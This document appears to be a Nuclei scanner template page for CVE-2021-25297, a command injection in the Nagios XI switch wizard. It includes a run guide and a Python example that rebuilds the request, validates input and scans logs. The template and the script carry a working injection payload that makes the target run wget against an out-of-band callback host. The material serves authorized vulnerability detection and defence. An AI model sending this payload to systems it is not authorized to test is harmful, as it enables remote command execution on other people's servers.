Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
ID: CVE-2021-25297
Severity: high
Author: k0pak4
Tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios
Description

Nagios XI 5.5.6 through 5.7.5 is vulnerable to authenticated OS command injection (CWE-78). The switch configuration wizard, implemented in /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php, passes the user-controlled ip_address parameter into a shell command without sanitizing it, so a single crafted HTTP request from a logged-in user executes arbitrary commands with the privileges of the web application process. From there an attacker can deploy malware, obtain sensitive information, modify data, or take full control of the host. Valid Nagios XI credentials are required (CVSS 3.1 PR:L); the flaw is not reachable without logging in, which is why the template has to be given a username and password. The vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog (the kev tag) and has a public Metasploit module (the msf tag).
YAML Source

```yaml
id: CVE-2021-25297

info:
  name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
  author: k0pak4
  severity: high
  description: |
    Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system.
  remediation: |
    Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability.
  reference:
    - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
    - https://github.com/rapid7/metasploit-framework/pull/17494
    - http://nagios.com
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25297
    - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-25297
    cwe-id: CWE-78
    epss-score: 0.89037
    epss-percentile: 0.98721
    cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: nagios
    product: nagios_xi
    shodan-query:
      - title:"Nagios XI"
      - http.title:"nagios xi"
    fofa-query:
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios

http:
  - raw:
      - |
        GET /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}

      - |
        GET /nagiosxi/index.php HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body_4
        words:
          - "<b>Ping</b>"
          - "Switch Details"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nsp
        group: 1
        regex:
          - "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
        internal: true
        part: body

      - type: regex
        name: nsp_auth
        group: 1
        regex:
          - "var nsp_str = ['\"](.*)['\"];"
        internal: true
        part: body
# digest: 4a0a004730450220360c1494570e0ff5fe26b078eb0f6e21693cccf863585f9c49a97b4d00490bd4022100b7c18b74381ebec4cf6707fd977f53f8499998ae10791c21eeb8ad2a910534f7:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is run with Nuclei. The check is authenticated: the template fetches login.php, extracts the nsp CSRF token, logs in with the username and password template variables, extracts the per-session nsp_str token from index.php and only then sends the switch-wizard request, so both variables must be supplied with -var or the login is sent with the literal placeholders and fails. Confirmation is out-of-band: the injected wget must reach the interactsh callback, so the target has to be able to resolve and reach external hosts, and a host that returns the "Switch Details" page but produces no DNS interaction is reported as not vulnerable (all matchers are ANDed). Because the probe really executes wget on the target, it leaves a command execution in the target's logs and should only be run with authorization.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25297.yaml" -var username=USER -var password=PASS
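The Python script below is an added example, not code from the template, its author or Nagios XI. It ties the injection point named in the description to the request flow of the template: it applies the template's two extractor regexes to constructed stand-in pages, builds the step-3 wizard request with the same ip_address payload the template sends, shows the allow-list check that would have rejected that value before it reached a shell (the generic CWE-78 fix, not the vendor's patch), and reuses that check to flag exploitation attempts in constructed Apache access-log lines. The sample pages, token values, the callback host oast.example and the log entries are all made up for the example.

```python
import re
from ipaddress import ip_address
from urllib.parse import parse_qs, quote, urlencode, urlsplit

# Constructed stand-ins for the two pages the template scrapes. They are not
# real Nagios XI output; only the fields the extractors look for are present.
# Each field sits on its own line because the extractor regexes use a greedy
# `.*` that is bounded only by the end of a line.
LOGIN_PAGE = """<form method="post" action="login.php">
<input type="hidden" name="nsp" value="c1a2b3d4e5f6">
<input type="text" name="username">
</form>"""
INDEX_PAGE = """<script>
var nsp_str = "9f8e7d6c5b4a";
</script>"""

# The two extractor regexes from the template, with the YAML escaping removed.
NSP_RE = re.compile(r"""name=['"]nsp['"] value=['"](.*)['"]>""")
NSP_AUTH_RE = re.compile(r"""var nsp_str = ['"](.*)['"];""")

WIZARD_PATH = "/nagiosxi/config/monitoringwizard.php"


def extract_nsp(html):
    """Extractor 'nsp': the CSRF token in the unauthenticated login form."""
    m = NSP_RE.search(html)
    return m.group(1) if m else None


def extract_nsp_auth(html):
    """Extractor 'nsp_auth': the per-session token embedded in index.php."""
    m = NSP_AUTH_RE.search(html)
    return m.group(1) if m else None


def build_wizard_path(nsp_auth, callback_url):
    """Request 4 of the template. The ip_address value closes the shell's
    double quote, ends the command with ';' and appends a wget to the callback."""
    params = {
        "update": "1",
        "nsp": nsp_auth,
        "nextstep": "3",
        "wizard": "switch",
        "ip_address": f'127.0.0.1"; wget {callback_url};',
        "snmpopts[snmpcommunity]": "public",
        "scaninterfaces": "on",
    }
    # quote (not quote_plus) encodes spaces as %20, as the template does.
    return WIZARD_PATH + "?" + urlencode(params, quote_via=quote)


def wizard_params(path):
    """Decode a wizard request path back into single-valued parameters."""
    return {k: v[0] for k, v in parse_qs(urlsplit(path).query).items()}


# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def is_safe_target(value):
    """Allow-list check a wizard should apply before building any command:
    accept an IP literal or a hostname, reject everything else. Generic
    CWE-78 mitigation for the example, not the vendor's actual patch."""
    try:
        ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def find_injection_attempts(log_lines):
    """Return (client, ip_address) for switch-wizard requests whose ip_address
    would fail the allow-list above, i.e. likely exploitation attempts."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != WIZARD_PATH:
            continue
        q = parse_qs(url.query)
        if q.get("wizard") != ["switch"]:
            continue
        for value in q.get("ip_address", []):
            if not is_safe_target(value):
                hits.append((line.split()[0], value))
    return hits


# Constructed Apache access-log lines: one exploit attempt, one normal wizard
# run and one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Feb/2023:12:00:01 +0000] "GET ' + WIZARD_PATH
    + '?update=1&nsp=9f8e7d6c5b4a&nextstep=3&wizard=switch'
    '&ip_address=127.0.0.1%22%3b%20wget%20http%3a%2f%2foast.example%3b'
    '&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1" 200 5123',
    '10.0.0.6 - - [10/Feb/2023:12:00:02 +0000] "GET ' + WIZARD_PATH
    + '?update=1&nsp=9f8e7d6c5b4a&nextstep=3&wizard=switch&ip_address=192.0.2.10'
    '&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1" 200 5123',
    '10.0.0.7 - - [10/Feb/2023:12:00:03 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 800',
]
```

Two caveats. The extractor regexes depend on `.` not matching a newline, so they only work when the nsp input and the nsp_str assignment sit on lines of their own, as the template assumes; on a minified page the greedy group would swallow everything up to the last quote on the line. The log check only sees parameters in the request line: the same values submitted in a POST body never reach the access log, so on a host that allows POST to the wizard, pair it with the out-of-band callback evidence or with process auditing of the web server user.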